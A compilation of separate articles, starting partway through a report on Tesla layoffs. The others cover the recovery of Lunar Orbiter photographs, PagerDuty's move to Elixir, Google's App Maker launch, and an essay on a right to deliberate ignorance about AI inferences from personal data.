In April, she said solar salespeople signed a new commission plan that would prevent them from receiving commissions at different stages in the sales process. Instead, they would only receive commissions at the end of the process. The former solar salesperson says she'll end up losing money she would have made under the old commission structure because she was fired before some of her clients had their installations completed.

"There's no way around it, they just got away with not having to pay people," she said.

Tesla did not immediately respond to a request for comment about her claims.

Employees were caught off-guard

Another employee, who worked in vehicle delivery and asked not to be identified by name, said he wasn't aware of the meeting that would lead to his firing before he came to work on Monday morning. An hour after he arrived at the office, two of his supervisors and a regional human-resources manager brought one of his colleagues into a conference room, putting the vehicle delivery employee on alert.

"It was a little odd to see three managers show up," he said

Once his colleague left the conference room, she gathered her belongings and was escorted out of the building. The former delivery employee said he thought his colleague had been fired for performance reasons, but once he was called into the conference room, he said he realized his position was being eliminated.

He was given no advance notice of the meeting before Monday. For each of the prior two weeks, he had worked 60 hours over six days, he said.

He had worked for Tesla since 2015 and said during his time at the company his team had to adjust to a sixfold increase in deliveries while being told to increase delivery speed. Despite the raised expectations, his team decreased from its original size.

"How are we understaffed and you're still letting 9% of employees go?" he said, "It boggled my mind."

A third employee, an engineer who still works at Tesla and asked not to be identified by name, said he discovered his manager had been fired after the manager didn't show up for a meeting on Tuesday. When a colleague of his attempted to email the manager, the email bounced back. He said he thinks they fired the wrong people.

"I think it was really squirrelly how they did it," he said.

If you've worked for Tesla and have a story to share, you can contact this reporter at mmatousek@businessinsider.com.

Fifty years ago, 5 unmanned lunar orbiters circled the moon, taking extremely high resolution photos of the surface. They were trying to find the perfect landing site for the Apollo missions. They would be good enough to blow up to 40 x 54ft images that the astronauts would walk across looking for the great spot. After their use, the images were locked away from the public, as at the time they would have revealed the superior technology of the USA’s spy satellite cameras, which the orbiters cameras were designed from. Instead the images from that time were grainy and low resolution, made to be so by NASA.

These spacecraft were Lunar Orbiter I to V, and they were sent by NASA during 1966 and 67. In the late 1960’s, after the Apollo era, the data that came back on analog tapes was placed in storage in Maryland. In the mid 1980’s they were transferred to JPL, under the care of Nancy Evans, co-founder of the NASA Planetary Data System (PDS). The tapes were moved around for many years, until Nancy found Dennis Wingo and Keith Cowing. They decided they needed to be digitised for future generations, and brought them to NASA Ames Research Centre. They set up shop in an abandoned McDonalds, offered to them as free space. They christened the place McMoon. The aim was to digitise these tapes before the technology used to read them disappeared, or the tapes destroyed.

The Lunar Orbiters never returned to Earth with the imagery. Instead, the Orbiter developed the 70mm film (yes film) and then raster scanned the negatives with a 5 micron spot (200 lines/mm resolution) and beamed the data back to Earth using lossless analog compression, which was yet to actually be patented by anyone. Three ground stations on earth, one of which was in Madrid, another in Australia and the other in California recieved the signals and recorded them. The transmissions were recorded on to magnetic tape. The tapes needed Ampex FR-900 drives to read them, a refrigerator sizes device that costed $300,000 to buy new in the 1960’s.

The tape drive that they found first had to be restored, beginning with a wash in the former restaurants sink. The machine needed a custom built demodulator to extract the image, an analog to digital converter, and a monitor connection to view what was happening. As the labelling system of the tapes had been forgotten, and documentation was not readily available, they had to hand decode the coordinates on the tapes. They also had a big collection from parts of other FR-900’s and similar designs. The spare parts were constantly needed to keep the recorder going, there was good reason that the format didn’t continue for for long.

In order to read the tapes, the heads of the FR-900 apply a magnetic field to the tape inducing a current through it. The current can be measured and run through the demodulator. This pulls out the image signal, that is then run through an analog to digital converter. The data is then processed on a computer using the custom system they set up. They made custom software that interfaced with Photoshop to link the relevant parts of the image together. The orbiters sent out each image in multiple transmissions, with each strip (one tin) making up part of the image. the software manages to link up the images nearly seamlessly at the full potential resolution. The best of the images can show the lunar surface at a resolution less than 1m, much better than any other orbiter that has been there.

They were huge files, even by today’s standards. One of the later images can be as big as 2Gb on a modern PC, with photos on top resolution DSLRs only being about 10Mb you can see how big these images are. One engineer said you could blow the images up to the size of a billboard without losing any quality. When the initial NASA engineers printed off these images, they had to hang them in a church because they were so big. The below images show some idea of the scale of these images. Each individual image when printed out was 1.58m by 0.4m.

Orbiter IV was there to produce a single big image of the front side of the moon. In pictures taken between May 11-25, 1967 the Orbiter took a number of images that span the area from the north pole to the south pole and from the eastern limb to the western limb. The complete mosaic of an image stretched 40 by 45 ft. The engineers laid it out on the floor and all the observers including the astronauts had to crawl over it and take off their shoes. The images were so good, even at this size that some astronomers used magnifying glasses. This giant image was the primary source to select the sites for Orbiter V  to photograph in a higher resolution. The images taken by Orbiter V decided the exact locations for Apollo 11 to land.

Since 2007 the Lunar Orbiter Image Recovery Project has brought back 2000 images from 1500 analog tapes. The first ever picture of an earthrise. As Keith Cowing said “an image taken a quarter of a fucking million miles away in 1966. The Beatles were warming up to play Shea Stadium at the moment it was being taken.” To find more of those images go to their website, but I warn you those images are huge.

When PagerDuty was founded, development speed was of the essence—so it should be no surprise when we reveal that Rails was the initial sole bit of technology we ran on. Soon, limitations caused the early team to look around and Scala was adopted to help us scale up.

However, there’s a huge gap between Scala and Ruby, including how the languages look and what the communities find important; in short, how everything feels. The Ruby community, and especially the Rails subcommunity, puts a huge value on the developer experience over pretty much anything else. Scala, on the other hand, has more academic and formalistic roots and tries to convince its users that correctness trumps, well, pretty much anything.

It nagged me and it looked like we had a gap in our tech stack that was hard to reconcile. Scala wasn’t likely to going to power our main site, and though we needed better performance and better scalability than Ruby and Rails could deliver, there was a very large gap and switching was cumbersome. There was also little love for the initial Scala codebase, as it quickly became apparent that writing clean and maintainable Scala code was hard and some technology choices made scaling more difficult than anticipated.

When thinking about these issues in 2015, I let myself be guided by an old Extreme Programming practice, that of the System Metaphor. Given that I did some work in the telecommunications world, it wasn’t too far-fetched to look at PagerDuty like some sort of advanced (telco) switch: stuff comes in, rules and logic route and change it, and stuff goes out. As with any analogy, you can stretch it as far as you want (look at an incident as an open circuit), but for me, just squinting a bit and realizing that it was a workable metaphor was enough.

If you say “telecom” and “programming language,” you say “Erlang.” I looked at Erlang before but the language never appealed to me, and in the past, it never really hit the sweet spot in terms of the kinds of systems I was working on. This time, however, the “sweet spot” part seemed to hold, but still—a language that was based on Prolog, that got a lot of things backward (like mixing up what’s uppercased and what’s lowercased), felt like C with header files … that would be a hard sell.

So I parked that idea, went back to work, and forgot about it until I stumbled upon Elixir a month or two later. Now this was interesting! Someone with Ruby/Rails street cred went off, built a language on top of Erlang’s Virtual Machine: One that was modern, fast, very high level, had Lisp/Scheme-style macros, and still professed to be nice to users (rather than Ph.D. students).

Needless to say, it immediately scored the top spot on my “languages to learn this year” list and I started working through documentation, example code, etc. What was promised, held up—it performed above expectations both in execution as well as in development speed. And what’s more, developing in Elixir was sheer fun.

After getting my feet wet and becoming more and more convinced that this could indeed remove the need for Scala, be nicer to Ruby users, and overall make us go faster while having more fun, I started looking for the dreaded Pilot Project.

Introducing Elixir

Introducing languages is tricky. There’s a large cost involved with the introduction of new programming languages, although people rarely account for that. So you need to be sure. And the only way to be sure is, somewhat paradoxically, to get started and see what happens. As such, a pilot needs to have skin in the game, be mission-critical, and be complex yet limited enough that you can pull the plug and rewrite everything in one of your old languages.

For my team, the opportunity came when we wanted to have a “Rails-native” way to talk to Kafka transactionally. In order to ease the ramp-up for the MySQL-transaction-heavy Rails app, we wanted to build a system that basically scraped a database table for Kafka messages and sent it to Kafka. Though we knew this wasn’t really the best way to interact with Kafka, it did allow us to simply emit Kafka messages as part of the current ActiveRecord transaction. That made it really easy to enhance existing code with Kafka side effects and reason about what would happen on rollbacks, etc.

We opted for this project as our Elixir pilot—it was high value and the first planned Kafka messages would be on our critical notification path, but it was still very self-contained and would have been relatively easy to redo in Scala if the project failed. It doesn’t often happen that you stumble upon pretty much the perfect candidate for a new language pilot, but there it was. We jumped into the deep and came out several weeks later with a new service that required a lot of tuning and shaping, but Elixir never got in the way of that.

Needless to say, this didn’t sway the whole company to “Nice, let’s drop everything and rewrite all we have in Elixir,” but this was an important first step. We started evangelizing, helped incubate a couple more projects in other teams, and slowly grew the language’s footprint. We also tried to hire people who liked Elixir, hosted a lot of Toronto Elixir meetups to get in touch with the local community, and—slowly but steadily—team after team started adopting the language. Today, we have a good mix of teams that are fully on Elixir, teams that are ramping up, and teams who are still waiting for the first project that will allow them to say, “We’ll do this one in Elixir.”

Elixir has been mostly selling itself: it works, it sits on a rock-solid platform, code is very understandable as the community has a healthy aversion towards the sort of “magic” that makes Rails tick, and it’s quite simple to pick up as it has a small surface area. By now, it’s pretty unlikely that anything that flows through PagerDuty is not going to be touched by Elixir code. This year, we’re betting big on it by lifting some major pieces of functionality out of their legacy stacks and into Elixir, and there are zero doubts on whether Elixir will be able to handle the sort of traffic that PagerDuty is dealing with in 2018. From initial hunch through pilot into full-scale production, it’s been a pretty gentle ride and some of us are secretly hoping that one day, we’ll only have to deal with Elixir code.

An article on Elixir would not be complete without a shout out to the community’s leadership, starting with Elixir inventor José Valim, whom I largely credit for the language’s culture. Elixir comes with one of the nicest and most helpful communities around, and whether on Slack, on the Elixir Forum, or on other channels like Stack Overflow and IRC, people are polite, helpful, and cooperative. Debates are short and few, and the speed of progress is amazing. That alone makes Elixir worth a try.

Want to chat more about Elixir? PagerDuty engineers can usually be found at the San Francisco and Toronto meetups. And if you’re interested in joining PagerDuty, we’re always looking for great talent—check out our careers page for current open roles.

It’s been a year and a half since announced App Maker, its online tool for quickly building and deploying business apps on the web. The company has mostly remained quiet about App Maker ever since and kept it in a private preview mode, but today, it announced that the service is now generally available and open to all developers who want to give it a try.

Access to App Maker comes with any G Suite Business and Enterprise subscription, as well as the G Suite for Education edition. The overall idea here is to help virtually anybody in an organization — including those with little to no coding experience — to build their own line-of-business apps based on data that’s already stored in G Suite, Google’s Cloud SQL database or any other database that supports JDBC or that offers a REST API (that that’s obviously a bit more of an advanced operation).

To do this, App Maker provides users with a low-code application development environment that lets you build applications through a straightforward drag and drop environment. Though it takes a bit of work to set up the database connectivity, once that’s done, the actual design part looks to be pretty easy — and thanks to a set of responsive templates, those final applications should work, no matter whether you are on a phone or desktop.

While many applications will likely rely on a database, it’s worth noting that developers can access Gmail, Google Calendar, Sheets and other data sources as well. In total, App Maker offers access to 40 Google Services. Unlike other low-code services like Mendix, K2 or even Microsoft’s PowerApps tools, Google’s App Maker seems to focus mostly on Google’s own services and doesn’t offer built-in connectivity with third-party services like Salesforce, for example. Chances are, of course, that now that App Maker is out of preview, Google will start adding more functionality to the service.

After the fall of the Berlin Wall, East German citizens were offered the chance to read the files kept on them by the Stasi, the much-feared Communist-era secret police service. To date, it is estimated that only 10 percent have taken the opportunity.

In 2007, James Watson, the co-discoverer of the structure of DNA, asked that he not be given any information about his APOE gene, one allele of which is a known risk factor for Alzheimer’s disease.

Most people tell pollsters that, given the choice, they would prefer not to know the date of their own death—or even the future dates of happy events.

Each of these is an example of willful ignorance. Socrates may have made the case that the unexamined life is not worth living, and Hobbes may have argued that curiosity is mankind’s primary passion, but many of our oldest stories actually describe the dangers of knowing too much. From Adam and Eve and the tree of knowledge to Prometheus stealing the secret of fire, they teach us that real-life decisions need to strike a delicate balance between choosing to know, and choosing not to.

But what if a technology came along that shifted this balance unpredictably, complicating how we make decisions about when to remain ignorant? That technology is here: It’s called artificial intelligence.

AI can find patterns and make inferences using relatively little data. Only a handful of Facebook likes are necessary to predict your personality, race, and gender, for example. Another computer algorithm claims it can distinguish between homosexual and heterosexual men with 81 percent accuracy, and homosexual and heterosexual women with 71 percent accuracy, based on their picture alone.¹ An algorithm named COMPAS (Correctional Offender Management Profiling for Alternative Sanctions) can predict criminal recidivism from data like juvenile arrests, criminal records in the family, education, social isolation, and leisure activities with 65 percent accuracy.²

Knowledge can sometimes corrupt judgment, and we often choose to remain deliberately ignorant in response.

In each of these cases, the nature of the conclusion can represent a surprising departure from the nature of the data used (even if the validity of some of the results continues to be debated). That makes it hard to control what we know. There is also little to no regulation in place to help us remain ignorant: There is no protected “right not to know.”

This creates an atmosphere where, in the words of Facebook’s old motto, we are prone to “move fast and break things.” But when it comes to details about our private lives, is breaking things really what we want to be doing?

Governments and lawmakers have known for decades that Pandora’s box is sometimes best left closed. There have been laws on the books protecting the individual’s right to ignorance stretching back to at least the 1990s. The 1997 European Convention on Human Rights and Biomedicine, for example, states that “Everyone is entitled to know any information collected about his or her health. However, the wishes of individuals not to be so informed shall be observed.” Similarly, the 1995 World Medical Association’s Declaration on the Rights of the Patient states that “the patient has the right not to be informed [of medical data] on his/her explicit request, unless required for the protection of another person’s life.”

Writing right-to-ignorance laws for AI, though, is a very different matter. While medical data is strongly regulated, data used by AI is often in the hands of the notoriously unregulated for-profit tech sector. The types of data that AI deals with are also much broader, so that any corresponding laws require a broader scope of understanding of what a right to ignorance means. Research into the psychology of deliberate ignorance would help with designing right-to-ignorance laws for AI. But, surprisingly, the topic has long been ignored as a topic of rigorous scientific inquiry, perhaps because of the implicit assumption that deliberately avoiding information is irrational.

Recently, though, the psychologist Ralph Hertwig and legal scholar Christoph Engel have published an extensive taxonomy of motives for deliberate ignorance. They identified two sets of motives, in particular, that have a particular relevance to the need for ignorance in the face of AI.

The first set of motives revolves around impartiality and fairness. Simply put, knowledge can sometimes corrupt judgment, and we often choose to remain deliberately ignorant in response. For example, peer reviews of academic papers are usually anonymous. Insurance companies in most countries are not permitted to know all the details of their client’s health before they enroll; they only know general risk factors. This type of consideration is particularly relevant to AI, because AI can produce highly prejudicial information.

The second relevant motives are emotional regulation and regret avoidance. Deliberate ignorance, Hertwig and Engel write, can help people to maintain “cherished beliefs,” and avoid “mental discomfort, fear, and cognitive dissonance.”³ The prevalence of deliberate ignorance is high. About 90 percent of surveyed Germans want to avoid negative feelings that may arise from “foreknowledge of negative events, such as death and divorce,” and 40 to 70 percent also do not want to know about positive events, to help maintain “positive feelings of surprise and suspense” that come from, for example, not knowing the sex of an unborn child.⁴

We’ve been giving our data away for so long that we’ve forgotten it’s ours in the first place.

These sets of motives can help us understand the need to protect ignorance in the face of AI. The AI “gaydar” algorithm, for example, appears to have close to zero potential benefits, but great potential costs when it comes to impartiality and fairness. As The Economist put it, “in parts of the world where being gay is socially unacceptable, or illegal, such an algorithm could pose a serious threat to safety.” Similarly, the proposed benefits of an ethnicity detector currently under development at NtechLab seem to pale in comparison to the negative impact on impartiality and fairness. The use of the COMPAS recidivism prediction software has a higher accuracy than a human but, as Dressel and Farid write, is “not as accurate as we might want, particularly from the point of view of a defendant whose future lies in the balance.”² Algorithms that predict individual life expectancy, like those being developed by Aspire Health, are not necessarily making emotional regulation any easier.

These examples illustrate the utility of identifying individual motives for ignorance, and show how complex questions of knowledge and ignorance can be, especially when AI is involved. There is no ready-made answer to the question of when collective ignorance is beneficial or ethically appropriate. The ideal approach would be to consider each case individually, performing a risk-benefit analysis. Ideally, given the complexity of the debate and the weight of its consequences, this analysis would be public, include diverse stakeholder and expert opinions, and consider all possible future outcomes, including worst-case scenarios.

That’s a lot to ask—in fact, it is probably infeasible in most cases. So how do we handle in broad strokes something that calls for fine shading?

One approach is to control and restrict the kinds of inferences we allow machines to make from data that they have already collected. We could “forbid” judicial algorithms from using race as a predictor variable, for example, or exclude gender from the predictive analyses of potential job candidates. But there are problems with this approach.

First of all, restricting the information used by big companies is costly and technically difficult. It would require those companies to open-source their algorithms, and large governmental agencies to constantly audit them. Plus once big data sets have been collected, there are many ways to infer “forbidden knowledge” in circuitous ways. Suppose that using gender information to predict academic success was declared illegal. It would be straightforward to use the variables “type of car owned” and “favorite music genre” as a proxy for gender, performing a second-order inference and resting the prediction on proxies of gender after all. Inferences about gender may even be accidentally built into an algorithm despite a company’s best intentions. These second-order inferences make the auditing of algorithms even more daunting. The more variables that are included in an analysis, the higher the chances that second-order inferences will occur.

The more radical—and potentially more effective—approach to protecting the right to ignorance is to prevent data from being gathered in the first place. In a pioneering move in 2017, for example, Germany passed legislation that prohibits self-driving cars from identifying people on the street by their race, age, and gender. This means that the car will never be able to inform its driving decisions—and especially the decisions it needs to take when an accident is unavoidable—with data from these categories.

In line with this way of thinking, the European Union’s new General Data Protection Regulation (GDPR), which became effective in May 2018, states that companies are permitted to collect and store only the minimum amount of user data needed to provide a specific, stated service, and to get customers’ consent for how their data will be used. Such a restriction on data capture may also prevent second-order inferences. One important limitation of the GDPR approach is that companies can give themselves very broad objectives. The now shut down Cambridge Analytica’s explicit objective, for example, was to assess your personality, so technically its controversial collection of Facebook data satisfied GPDR’s guidelines. Similarly, GPDR’s focus on the alignment between data and a given service does not exclude categories of data we find morally questionable, nor completely stop companies from buying excluded data from a data broker as long as the user has consented—and many people consent to sharing their data even with relatively meager incentives. Researchers found that some MIT students would share their friends’ contact data for a slice of pizza.⁵ Clearly, further restrictions are needed. But how many?

The American activist and programmer Richard Stallman gave this answer: “There are so many ways to use data to hurt people that the only safe database is the one that was never collected.” But restricting data collection too severely may impede progress and undermine the benefits we stand to gain from AI.

Who should decide on these tradeoffs? We should all do it ourselves.

In most cases we are actually talking about data that is owned by you and me. We have been careless in giving it away for shiny apps without considering the consequences. In fact, we’ve been giving our data away for so long that we’ve forgotten it’s ours in the first place. Taking it back allows us to individually decide whether there is something we want or don’t want to know. Restoring data to its rightful owners—us—neatly solves many of the hard challenges we’ve discussed. It avoids the need to develop universal, prescient guidelines about data. Instead, millions of individuals will guide their own data usage according to their sense of what is right and wrong. We can all react in real time to evolving uses of data by companies, punishing or rewarding companies according to how their data is treated.

The computer science philosopher Jaron Lanier has suggested an additional, economic argument for placing data back into the hands of people. We should all be able to profit from our private data, he reasons, by selling it to big companies. The problem with this approach is twofold. First, it muddles the ethics of data use and ownership. The willingness to give data away for free is a good litmus test for the ethical integrity of the questions that data will be used to answer. How many individuals from a minority group would freely give away their data in order to create a facial recognition app like the gaydar? And how many would agree to be paid to do so? On the other hand, a majority of the population would gladly contribute their data to finding a cure for cancer. Second, putting (high) economic value on personal data may coerce people to share their data and make data privacy a privilege of the rich.

This isn’t to say that individual action alone will be sufficient. Collective action by society’s institutions will also be required. Even if only a small portion of the population shares their sensitive data, the result may be a high predictive accuracy opposed by the majority. Not all of us are aware of this. To prevent unwanted consequences we would need additional laws and public debates.

The Economist has written that the world’s most valuable resource is no longer oil—it’s data. But data is very different from oil. Data is an unlimited resource, it’s owned by individuals, and it’s best exchanged without any transactional economic value. Taking the profit out of oil kills the oil market. As a first step, taking profit out of data provides the space we need to create and maintain ethical standards that can survive the coming of AI, and pave the way for managing collective ignorance. In other words, as data becomes one of the most useful commodities of the modern world, it also needs to become one of the cheapest.

Christina Leuker is a pre-doctoral fellow at the Max Planck Institute for Human Development.

Wouter van den Bos is a research scientist at the Max Planck Institute for Human Development.

References

1. Wang, Y. & Kosinski, M. Deep neural networks are more accurate than humans at detecting sexual orientation from facial images. Journal of Personality and Social Psychology114, 246-257 (2018).

2. Dressel, J. & Farid, H. The accuracy, fairness, and limits of predicting recidivism. Science Advances4, eaao5580 (2018).

3. Hertwig, R. & Engel, C. Homo ignorans: Deliberately choosing not to know. Perspectives on Psychological Science11, 359-372 (2016).

4. Gigerenzer, G. & Garcia-Retamero, R. Cassandra’s regret: The psychology of not wanting to know. Psychological Review124, 179-196 (2017).

5. Athey, S. Catalini, C., & Tucker, C.E. The digital privacy paradox: Small money, small costs, small talk. Stanford University Graduate School of Business Research Paper No. 17-14 (2018).

Additional Reading

Stallman, R. A radical proposal to keep your personal data safe. The Guardian (2018).

Staff writers. The world’s most valuable resource is no longer oil, but data. The Economist (2017).

Lead photo collage credit: Oliver Burston / Getty Images; Pixabay